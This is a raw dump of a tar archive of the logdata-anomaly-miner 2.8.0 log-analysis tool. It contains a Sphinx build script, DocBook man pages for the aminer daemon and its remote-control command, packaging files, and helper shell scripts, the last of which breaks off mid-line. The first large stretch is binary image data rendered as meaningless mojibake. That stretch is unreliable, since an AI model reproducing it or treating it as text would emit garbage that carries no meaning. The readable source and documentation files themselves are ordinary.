^u+ΜG]ӝy{#E:uo iEjw6*lp8 9_aωUDMḧk$R(wWL__>7x'k>֎\_Xp-a 4nɶTuѡ3YӯZZm6ZJ)iE)?C?G|fgnv;sݫWƾ"ռ16o,zM̦FڭH#n89qj'hO'n6q{b>+ٟ7xI1O4k~ou?s:ǦNm绞)$Vgndd|EjMgkWRTeg U~/+A~7IinnR%v `O~_u|SQt fy@P@b41GOƟAZxe$ڐ*ڼ>&|Qt1<*|QOψ_GKkQҾ.w$T?uuNcqww"TP]xW٧&msr'&zw0袊D((((((((((((+c7hZǭg_PQzȴgGIƁ^kR>|eSY_|Yᬾ+TŴ^d$ɚ> xJxGQU&xϖ\d}& ~73STfHm%,?/H*}޸10G|%\/󁢊+(((((((((((((+5%҄:Zݯ cW,z~kw9E8VlMneU7NIvgo&3W??%obh۟෍x@|[&\֋Li"Ug?5M->%iaecVlb6RQub?:pxyF&Iwz-/i7ſʼ ['#طuoǩ~uHsg=O7Q Tzcך6tim60+9I{{CGiig+>KBg.k_( /:kqQ^ۛ9 QIvg.kh4Ix9)0ΩOe-ĺi 3ІVR>ރ+h2F$ ,QO=Cp÷5/?OK i$q`cXftho-><~? "[j_E;2BcNNmib<5,(INiϳ<ϔ5YT-G|Qog0Ǚ) B>kcR%ܖҟrG_z/m6/kzz\e$P'.2y/>=;hh3Karrzc&9FUx4 Fi+WJw+\N>$B#m&e r3؏g #麃 ̎ycd|dG'xa7^4g3ٛu-v7*9S`A.Kmu0J+Ez' u ύ~.QZ=mP[bR"ڳԧ!IB(hQEQEQEQEQEQEQEQEQEQEQEQEQE*v S_> 77ei" t꥘?d,%TB˕2gj} PƵK[χxb@mDPMz8Xe%,=,ܾj~wZ>!ҥu{Ic129`<~_L}ZU)`)Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@}kP:OEy޼k1|W6'-mvYAarr;kߌߴG5ZXjW-Yc HIuQw=krQ|?Wl]Y$j﫲Wny-wRO>#R]o 2Ox6 *nT@.PHw_wÿvu#G]]a sҕˣf>$I[oٞ.ӼC a`ԡfe_m'ԡP?5x_f&>..4_ڴS=d>`1ֿmK5,&gOPRR$a`jYVs\Ư z_ -Wĺ.n2k9##kꏄ| ំ-kiXMσ m^-Y'b(՝Ywi%vC35\N9',85Ïxc{>ieKall>⏄t{s5ݺ|ص<,p:U^rWG~OZ2UVrnﶟבKz|YMy;d0Z'@v6LuZ./-zޗ@|6n4N}mn7 PY~Nxo77](cbhݎv_i*T%]Tgk^|9OZ腯{;ɴ.1\A"YNAB+~о>zuִip[Kn,$H*M8*ŧ+14S{wV76_#Z>JϪ#WF7z% N2I6 09 }Eywu/4=_sy)A*2g@ﹽ ^\4iOIF3 Lk>>8o/w>IPVyi%=Y׹|<[cA }*'5_ |Ie (R}Oe;.uq+4nPI>U2z8)Vb'}T[3{|q{ BnF"4X\]XοM.k 2x^9'NŮ}>][3#qO"{[k>H|L,mPO![V%8^F8R[};S>#󊼳O|.ѣYvzaʓji~w~i8Fb:~Lgxm$_Xi5"-FX[di#9VhiJ7i7FtLM:sFvC38_'X/O[ې!&8;ArIcƦ|Yx<:Xu=E~zQEQEQEQEQEQEQEQEQEQEQEQEv ;>ެ(Xk,ȌAuoh~}5 G?~&kWp'_FuM(kS~6)?G埨J e ^ ѵwhŠ((((((((((((t|Bmn">i-eWxia3i"%'k8<#7F}e&st702rz_߶/ K~|6 OIu9|],:[Lu\)~ω(vsM{3RpDKylH_\tq%uw*zoS_ ~)!:I*>SJQO=C0#OAnx<[md\0Ǚ ).}wF=xh_(_ŸO&ĢZv= Y#>ZƘ"ǀaxX~ i4TX[%~A9qȭRU*[arVJOؿ*ן64I;MViOTS?Өk _ߵς).me%"M}@XW韀mO7/<=GT.ҫ"磩=BA?woc>YiZy d{ -gi+HR%fhN:R>gs2 R &sa/'JuPK|-KkSnm(9ff4’rzc$|:o5}ZI Y,}B'3֦ԩOꒃZah*'2?1_u_ş ~:u3n*N1 dq_ߴ߂;xoƾ#N[HC*1F+U*N-4ox*n-4yQ^Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@zW|U6qq0F!?R~"־X|>ls 0żϻTTG6&&~x{M43km'JТ¾CeȾ+xZoi1*kɐ:6$ބ+v55dFVPH"IIYz0cZzeދ\X[kyn9aaPj~~ŷ7[}I"@XJz'^m3X#H8aٔ`}GT#7]_dEQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@~<"?@ A|N5EkJwfoG5w;>!WCɂq\-VMCQEQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@jc:5M#Jkۗڈ:Vc=[OZz^dw FKn=OŚwM:k_]kS(v& I@:9SikQWo8|%GUMbX GbM}Eꤒ?VuTw՟1~ >'!rQ$IC~~+ >h+ .0hGz<Z*[kb Z?ΧÚ ;=.vFՏRܒIׂ~?ǯGԵ|R!\p;$=++2pjQFN-In5^*hZjr卿Bu#ɯۯ⭬(qv`9#% <N?%S][zΑX˧ #_]G>>"5dEuQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@M[[*~L?"@|1>|J'Y"jl*HA⣆5'R9)aINQEuQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@WE/įAOyy/,z$K]Tz$IwQWd >TeSc {]OF\':RS]Q ?Mqs1Դ=Q%|ׯ-w؍OúK}W5w_b5yA\\^)Q\ŔApAI_Trh'VoPm@%k/[Z~Q_ M MU}\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  URAf<:Pm@%kGL::"F_>K[J~&xw?xW- 4'8 Zc&ʡAVP;$ۜiwZ?F~fo,FR*:>x;V,pDٚ ? ~߳)ǰt,Ot|G_rq|'E} j?<>wGWc?F}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”8'W_ ;֫?dcM."./{-PYr`/!+R?2A-p1W7to4.?VZ[h{>a7w9=eðm'Ê騢ϪJ (WoI௏62%VZ4!F=р%2y#I*)AEٕ8~ |gvGew8ʶ i郸NwN{P~kYCyeqݤ)p{85b4'\+o][Mԃ=q =(!=sϥmy_#6>K;}B+Y㹷CG4.WůFMRw-/푥tcG%TX63q/kI̚Vڬ[ 1Skjokr8+i?Ѧ?G+o 7ͥؖڊ ǘݷ>lo/ jhk[Uu?ixW/Rկ.tYd !">ՙWzgNk>~>gɏ >V\կu2]]3'5x'_ =2o޼_iV %!n_ |=ivZmƣ{&v[D*N'T87+?jk>8j$|Mjm\E RK"7ꪬI&hzh;Ixve`bSx";:k[$r2xe<c@׭S7X _[`qq^yR 7TU3:˭g>>gɓ,>ouҨ}??1_| wNDw?j'͏{ OoWu~VIiqh::V ƾ(O-j+ xr#? OO>&Rl'3K?qVE׍xY%wާ'%Tc00C@.s6:m.'Kxՙ觉4o 4@=a@XdSKAY} ,sc_O*D~fW_o%~ -JԯҿJ`[/2Oy%CW?!ӿnme/.r@sEW% ~]'\_~-sA 6E4I=]?ŭ>S-@rі6e? Sj$:OKPe~|'$,i'$|_ 7_!(~ +_03뿳 $iڤ\4PSb-"n1޼w5_M2J $nG^=Ͼ۽OTu8/Zݡ%Pѱssqh?ᵼ@<zFֳg?k _^s RVUw,=")?|A?|A_Df,~w 7K$2(#q) _%}Qq2ey.|;c,3|mE?:J?d-1 l8eZExs +)_}@Q@|pCZBczMyWu?6)6<9x|7rFzV5x1aYx,0ؐWS_DG'I^@, mcƲC'HHnqW >d_@ZDAX<+_3 [OWR(~,+oCƿ}7?:$˂yzg{Z+D=|s$jӿEƫéY'oqE"VQ]]Eck5#2H碨'Ϳ\).YxApF}G_^?< MFdMHo۷~+hQǔ7-gh3N=O__ᯋ fItQap(>+|Huk'yLV!}̣ WԟW?=_4|⿊z. ifX/1S>`:o ??uh?Ac:[|Y5;157! 8[aBOڽ~Ο=VH-d#O W w %F?Z|Oai 7|pCZoH}uKOrGX߲7{g>|`_:;ǥFe2 F1 o}@IUZq7_D=Dkɘ~5⿱񗈓'iRGbD׷ԟB|MnUxE#1ho'$6f è0k>xk0Ȗbβ$3(rE}F=?$c,-CYQ |4xGÞ9&[Zc+ArJ2~ x-B}#R/X`ކe,o ??uh/]?7$']J0y  Ɋg]dr3QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW_O*}mXF;o^d?]kuZ{I}w3sŎ7D=ɠ.| /QxT;9HrH*sF]h7VIn<9etpJh?ko/+M}  [|+_uKvZkZEG]2 ^݅|+x_V69[M]A{s}?R 7TU~ е-F-C\[ItInbYXv"_{U~xI>]]H8=Pn{Wn#KsӃ׼Pʿ׃]0N7i,N :9>[+k)2Bk| mC]Aϖ0>D@g?Ue7lqyv0} Ѿ$:OKV݅]bkx^Q)^i@/o(SQ`ҿJ`[/žhks/0^a٩KK+xV9!B'P?G?? \臯~*|~/ç&- `d0e* wXVÿ٣Ÿ mumc2&Sqlë΀>rjG_kW.5Xͳ=!ebTQ^@Q@|pCZ^YP#{Q2A F䏏Oƹ_4>MHkYRNٛ$a (Oۋ@اI^aDhl,mumF'Q@j᎓4S[KpN+rU/jş%~2-z櫩I,,.hJ`>yя?Je`[w_졚4-.QC+)=A޾~~&hk #4T` FriR<#p_!PTd8T `is^$5I<$%dR&xs%,/cY֯x-Űbw1ހ8/Ʒ&]չfHpI9J΋"2:V*FASFѬ|=imvV6# ORI&>'02@\ .цsܯ#Ծm.@ cn63߭zoxG}3]xÕ>Z4}+ղC'o΀=CRp4xl W _ov~ty㰞9[2rQ F3<߰S)uYmV#ؗ|~UKკm<.ƿ2b;z(?쁚+jokrg_?^xW[u,\F".[qX @_!~?1_&־;3,'.5 i7*davs7{g>xbBLi ;p;3I Ҭx6><4ezdkv H#gK%[SO|9Ut{FuK)?*؋G_=b9e/ xSi ,k uQڹ_;GngBTpu}. oJӮo*Qԫ~玡c|f;.̂C}Ԑ~u3\x{^Z܈0·lГԣF{#|!R ĺ|RcB#ip6}híoCvdEg01^]~útw. 'K%,W=:6⫻ȁ`$}K>?*vNUL 2>NUL if errorlevel 9009 ( echo. echo.The 'sphinx-build' command was not found. Make sure you have Sphinx echo.installed, then set the SPHINXBUILD environment variable to point echo.to the full path of the 'sphinx-build' executable. Alternatively you echo.may add the Sphinx directory to PATH. echo. echo.If you don't have Sphinx installed, grab it from echo.http://sphinx-doc.org/ exit /b 1 ) %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% goto end :help %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% :end popd logdata-anomaly-miner-2.8.0/docs/manpages/000077500000000000000000000000001500476301700204305ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/docs/manpages/aminer.1.xml000066400000000000000000000230141500476301700225640ustar00rootroot00000000000000 .

will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL. AMINER &dhsection; aminer lightweight tool for log checking, log analysis aminer DESCRIPTION This manual page documents briefly the aminer command. For more details see packaged documentation at /usr/share/doc/logdata-anomaly-miner. OPTIONS Specify the configuration file, otherwise /etc/aminer/config.py is used. See /etc/aminer/template_config.py or /etc/aminer/template_config.yml for configuration file templates and examples. With this parameter, aminer will detach from the terminal and daemonize. When not in foreground mode, aminer will also change the working directory to /, hence relative path in configuration file will not work. Set the statistic logging level. Possible stat-levels are 0 for no statistics, 1 (default) for normal statistic level and 2 for verbose statistics. Set the debug logging level. Possible debug-levels are 0 for no debugging, 1 (default) for normal output (INFO and above), 2 for printing all debug information. INTERNAL PARAMETER - DO NOT USE. It is just documented here for completeness. Restores the persistence directory from backup-directory. With this parameter all persisted data in config_properties['Core.PersistenceDir'] is deleted. USE THIS PARAMETER CAREFULLY. IT DELETES ALL SUB-DIRECTORIES OF THE PERSISTENCE DIRECTORY. Remove persisted data of one Detector. --remove NewMatchPathDetector --remove NewMatchPathDetector --remove EventCorrelationDetector With this parameter all live data in config_properties['Core.PersistenceDir']/AnalysisChild/RepositioningData is deleted. Prints the help-screen Prints the version-string FILES /etc/aminer/config.py The main configuration file for the aminer daemon. See /etc/aminer/template_config.py and /etc/aminer/template_config.yml for configuration file templates and examples. BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . At startup, aminer will quite likely print out some security warnings to increase transparency. They are here just to remind you of the limitations the current implementation. They should be the same as for nearly all other programs on your platform, just that others do not tell you. See the source code documentation for a short explanation, why a given part of the implementation is not that secure as it could be when leveraging the security features a platform could provide you. SEE ALSO aminerremotecontrol1 logdata-anomaly-miner-2.8.0/docs/manpages/aminerremotecontrol.1.xml000066400000000000000000001043571500476301700254130ustar00rootroot00000000000000 .
will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL. AMINERREMOTECONTROL &dhsection; aminerremotecontrol lightweight tool for log checking, log analysis aminerremotecontrol command file DESCRIPTION This manual page documents briefly the aminerremotecontrol command. The command executes arbitrary remote control commands in a running aminer child process. As child process is usually running with lowered privileges or SELinux/AppArmor confinement, you may observe unexpected results when accessing resources outside the child process, e.g. files. For more details see also packaged documentation at /usr/share/doc/logdata-anomaly-miner. Example usecases: /usr/bin/aminerremotecontrol --data '["LogResourceList"]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' /usr/bin/aminerremotecontrol --exec 'print_current_config(analysis_context)' /usr/bin/aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' OPTIONS with long options starting with two dashes ('-'). A summary of options is included below. For a complete description, see the info 1 files. socket Specify the Unix domain remote control socket path, otherwise /var/run/aminer-remote.socket is used. The socket is opened by aminer when 'RemoteControlSocket' feature is enabled in configuration. As the socket is of SOCK_STREAM type, it may also be forwarded via any other stream forwarders, e.g. socat (see UNIX-CONNECT and UNIX-LISTEN) and SSH (see LocalForward, DynamicForward). Access control is only done by file system permissions (DAC) of the socket, so make sure not to widen the access on error. command For each --exec option, the next argument is sent in a separate remote execution request using additional execution data (see --data). The command is executed in a separate execution namespace with only some variables added to the local namespace, e.g. execution data is available as 'remote_control_data'. When setting the local variable 'remoteControlResponse' within the executed command, the object is serialized using json and sent back in the response. file For each --exec-file option, the named file is loaded and content submitted in the very same way as if --exec parameter with content as string would have been used. data This parameter defines a json string defining Python objects, that will be sent with all subsequent --exec operations until changed again using another --data option. Take into account, that there are size limits for the request, very large data objects may exceed those limits. The execution context will expose the data as variable 'remote_control_data'. When set, aminerremotecontrol will not pass the result to repr. The returned object is just converted to a plain string via str(object) and the result is printed to avoid escaping of quotation marks, newlines, .... WARNING: This might be insecure: without escaping the printed data may contain terminal control sequences to exploit vulnerabilities or misconfiguration of your terminal to execute code with privileges of terminal or the process calling aminerremotecontrol (usually root). Commands This method allows you to change properties from the AminerConfig at runtime. For every property to be changed this method must be used. The method prints "property_name changed to value successfully." if the changes were successful and an individual message if the changes failed. Read more about which properties can be changed in the section. This method allows you to change attributes from components of the AminerConfig at runtime. For every attribute to be changed this method must be used. The method prints "component_name.attribute changed to value successfully. " if the changes were successful and an individual message if the changes failed. The type of the new value must be the same like the old value of the component_name.attribute example: aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPath','learn_mode', False)" Renames the component from the old_component_name to new_component_name. Therefore the component with the old_component_name is deleted from the registered components and registered with the new_component_name. example: aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPath','NewMatchPathDetector')" Adds the component to the atom_filter and registers it with the component_name. example: aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context,'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True),'NewMatchPathDet')" Prints the property with the property_name from the current AminerConfig. example: aminerremotecontrol --exec "print_config_property(analysis_context,'LogResourceList')" Prints the attribute of the component with the component_name. example: aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'NewMatchPath','learn_mode')" Prints the current AminerConfig. It is strongly recommended to use the parameter for better readability. example: aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response Saves the current AminerConfig into destination_file. destination_file must have write permissions by the aminerremotecontrol process or it returns an . example: aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" Saves all persistence data by calling PersistenceUtil.persist_all(). example: aminerremotecontrol --exec "persist_all()" Creates a backup of the current persistence directory and saves it in {persistence_dir}/backup/{timestamp}. Use this preferably after persist_all(). example: aminerremotecontrol --exec "create_backup()" Returns a list of all existing persistence backups. example: aminerremotecontrol --exec "list_backups()" Allowlists a path from event_data with the allowlist_event-method from the corresponding class of the component with the component_name. Only the following classes support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector and NewMatchPathValueComboDetector. For most of the components no allowlisting_data is needed and the event_data is a path. The NewMatchPathDetector supports a list of multiple pathes. The MissingMatchPathValueComboDetector needs an integer as allowlisting_data. A positive value sets the interval in seconds to the value. -1 sets the interval to the default value of 3600. A negative value removes the missingMatchPath. Please read the examples of this method to use the correct parameters. example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewMatchPathValueComboDetector','new/path')" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatchPathValueDetector','new/path',-11)" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDetector',['new/path'])" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','new/path')" This method returns the string representation of a history event with the dump_event_id. If no event with the dump_event_id could be found, the message "FAILURE: the event with dump_event_id could not be found!" is returned. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. example: aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" This method deletes the events with the event_ids from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The number of deleted events is returned. example: aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" This method lists max_event_count events from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. If max_event_count is None, all events from the history are returned. example: aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',600)" This method allowlists the events with the ids in theid_spec_list from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The allowlisting response is returned. example: aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" Reopen all StreamPrinterEventHandler streams for log rotation. example: aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)" Valid Property Names MailAlerting.TargetAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.TargetAddress', 'root@localhost')" Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. MailAlerting.FromAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.FromAddress', 'root@localhost')" Sender address of e-mail alerts. MailAlerting.SubjectPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.SubjectPrefix', 'aminer Alerts:')" Define, which text should be prepended to the standard aminer subject. Defaults to "aminer Alerts:" MailAlerting.EventCollectTime Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.EventCollectTime', 10)" Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. Defaults to 10 seconds. MailAlerting.MinAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MinAlertGap', 600)" Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. Defaults to 600 seconds. MailAlerting.MaxAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxAlertGap', 1000)" Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. MailAlerting.MaxEventsPerMessage Value: Number of messages (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxEventsPerMessage',1000)" Define how many events should be included in one alert mail at most. This defaults to 1000. LogPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'LogPrefix','Original log line: ')" Most analysis components implement the output_logline-property, which is True by default. Define a prefix to the original captured log lines. This defaults to ''. Resources.MaxMemoryUsage Value: 'Allowed RAM usage in Megabytes (Integer: 32-maxSystemRAM)' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Resources.MaxMemoryUsage', -1)" This property limits the maximal possible RAM in MB which the aminer process can use. Be careful at choosing the value, as a shortage of memory causes a MemoryError. This defaults to -1, which means that there is no limit. Core.PersistencePeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Core.PersistencePeriod', 300)" Use this property to change the time between persisting data in analysis components. Defaults to 600 seconds. Log.StatisticsLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsLevel',2)" Change the amount of data saved in statistics. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. Defaults to 1. Log.DebugLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.DebugLevel',2)" Change the debug logging level. Possible debug-levels are 0 for no logging, 1 for normal output (INFO and above), 2 for printing all debug information. Defaults to 1. Log.StatisticsPeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsPeriod', 360)" Change how often statistics are logged and reset. This defaults to 3600 seconds. FILES /var/run/aminer-remote.socket This is the default remote control socket used when not changed using the --control-socket option. BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . SEE ALSO aminer 1 logdata-anomaly-miner-2.8.0/docs/requirements.txt000066400000000000000000000000631500476301700221200ustar00rootroot00000000000000sphinx==3.5.1 sphinx_rtd_theme==0.5.1 recommonmark logdata-anomaly-miner-2.8.0/docs/setup.sh000077500000000000000000000006131500476301700203340ustar00rootroot00000000000000#!/bin/bash case "$1" in "install") ln -s ../README.md ln -s ../SECURITY.md ln -s ../LICENSE LICENSE.md git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git ../Wiki ;; "uninstall") unlink README.md unlink SECURITY.md unlink LICENSE.md test -d ../Wiki && rm -rf ../Wiki ;; *) echo "usage: $0 " exit 1 ;; esac logdata-anomaly-miner-2.8.0/pyproject.toml000066400000000000000000000005051500476301700206210ustar00rootroot00000000000000[project] dynamic = ["dependencies"] [tool.setuptools.dynamic] dependencies = {file = ["requirements.txt"]} [tool.vulture] exclude = ["^aecid-testsuite/", "*Interfaces.py", "*Interface.py"] make_whitelist = true min_confidence = 80 paths = ["source/root/usr/lib/logdata-anomaly-miner/"] sort_by_size = true verbose = false logdata-anomaly-miner-2.8.0/requirements.txt000066400000000000000000000002551500476301700211730ustar00rootroot00000000000000orjson pyzmq cerberus kafka-python==2.0.6 patsy statsmodels importlib-metadata tz scipy numpy setuptools dateutil six kafka urllib3 defusedxml yaml patsy pylibacl mypy pytz logdata-anomaly-miner-2.8.0/scripts/000077500000000000000000000000001500476301700173745ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/scripts/addbuildid.sh000077500000000000000000000012651500476301700220240ustar00rootroot00000000000000#!/bin/sh METAPATH="source/root/usr/lib/logdata-anomaly-miner/metadata.py" DOCSCONF="docs/conf.py" # fallback if git is not installed if [ ! `command -v git` ] then echo "Git is not installed. Won't set the BUILD_ID" exit 1 fi BUILD_ID=`git describe --tags --long 2> /dev/null` # fallback if this is not a git installation if [ $? -ne 0 ] then echo "This seems not to be a git installation." exit 0 fi BUILD_ID=`echo $BUILD_ID | sed 's/^[Vv]//'` echo "BUILD_ID: $BUILD_ID" if [ -e $METAPATH ] then sed -i "s/__version__\s*=\s*\".*\"/__version__ = \"$BUILD_ID\"/g" $METAPATH fi if [ -e $DOCSCONF ] then sed -i "s/release\s*=\s*'.*'/release = '$BUILD_ID'/g" $DOCSCONF fi exit 0 logdata-anomaly-miner-2.8.0/scripts/aminer_install.sh000077500000000000000000000047721500476301700227460ustar00rootroot00000000000000#!/bin/bash # if set to 1 this installer will delete the # source directory after installation DELDIR=1 BRANCH="main" URL="https://github.com/ait-aecid/logdata-anomaly-miner.git" AMINERDST=`mktemp -d` AMINERSRC="0" DISON=0 help() { echo "Usage: $0 [-h] [-b BRANCH] [-u GITURL] [-s LOCAL_GITREPO_PATH] [-d DIRECTORY]" 1>&2 } while getopts "hb:u:s:d:" options; do case "${options}" in b) BRANCH=${OPTARG} ;; h) help exit 1 ;; u) URL=${OPTARG} ;; s) AMINERSRC=${OPTARG} DELDIR=0 if [ ! -d $AMINERSRC ] then echo "Local Git-Repository $AMINERSRC does not exist." exit 1 fi ;; d) DISON=1 AMINERDST=${OPTARG} if [ -d $AMINERDST ] then echo "This directory($AMINERDST) already exists. Please remove it first" exit 1 fi DELDIR=0 ;; :) echo "$0: Must supply an argument to -$OPTARG." >&2 exit 1 ;; esac done which sudo > 